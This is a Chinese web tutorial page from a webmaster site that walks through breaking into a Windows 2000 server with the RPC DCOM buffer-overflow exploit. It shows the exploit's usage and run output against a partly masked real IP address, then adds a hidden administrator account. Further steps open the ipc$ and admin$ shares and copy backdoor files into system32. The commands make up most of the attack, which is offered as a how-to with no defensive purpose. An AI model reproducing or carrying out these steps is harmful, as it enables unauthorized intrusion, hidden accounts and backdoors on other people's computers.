站长网_站长创业_站长主页_站长之家_易采站长站

会员投稿 投稿指南 站长资讯通告: 名为Typosquatting的古老攻击手法 [误植]到底多可怕
搜索:
您的位置: 主页 > 教程 > 电脑安全 > 侵入攻防 > » 正文

dcomrpc入侵

来源: 易采站长站
需要的工具:
很好的:radmin.exe
扫描工具: retinarpcdcom.exe
溢出攻击工具:RpcDcom(通用溢出工具)
脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe
代理:sksockserver.exe
后门程序:WinEggDropShellPro3thVersion 好了,该做的都做的差不多了。现在开始把~~ 首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必 随便扫一下就会发现有许多主机开放的135端口)。。。。。。 (人走运座着都能检到钱) 211.217.50.xx第一个主机就被扫出来又此漏洞。开始工作 看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有
其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k 哈哈,是win2k server版本
展开命令行: [查看dcomrpc的用法用法 dcomrpc -d <host> [options] ] F:\hack>cd rpc\dcomrpc RPC DCOM Expl01t coded by .:[oc192.us]:. Security Complied and Modified by Expl01t www.longker.com Usage: dcomrpc -d <host> [options]
Options:
 -d:Hostname to attack [Required]
 -t:Type [Default: 0]
 -r:Return address [Default: Selected from target]
 -p:Attack port [Default: 135]
 -l:Bindshell port [Default: 666] Types:
 0 [0x0018759f]: [Win2k-Universal]
 1 [0x0100139d]: [WinXP-Universal]
开始进行溢出:
F:\hack>cd rpc\dcomrpc -d211.217.50.xx 0 RPC DCOM remote expl01t - .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[ ] Resolving host..
[ ] Done.
[ ] Expl01ting....Just wait...... 等到出现,说明溢出成功
c:\winnt\system32> 接着我们建立用户 c:\winnt\system32>net user blueye$Content$nbsp;1111 /add
命令成功完成。 把用户添加成超级管理员
c:\winnt\system32>net localgroup administrators blueye$Content$nbsp;/add
命令成功完成。
看看共享开了没有,没有的话把共享开开 c:\winnt\system32>net share
清单是空的。 c:\winnt\system32>net share ipc$Content$nbsp;
命令成功完成。
c:\winnt\system32>net share admin$Content$nbsp;
命令成功完成。 到这里我们入侵告一段落
[ 建 立 IPC$Content$nbsp;连 接 ,也可以使用tftp上传 ,先和对方建立连接] F:\hack>net use \\211.217.50.xx\ipc$Content$nbsp;"1111" /user:blueye$Content$nbsp; [ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里] F:\hack>copy d:\inject.exe \\211.217.50.xx\admin$\system32 F:\hack>copy d:\tback.dll \\211.217.50.xx\admin$\system32 然后运行后门程序,我们可以使用at命令。但是有的机器把at明令禁止了,建议直接开起telnet
Tags:
最新图文资讯
1 2 3 4 5 6
相关文章列表:
最新文章
易采站长站 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 人才招聘 - 帮助 -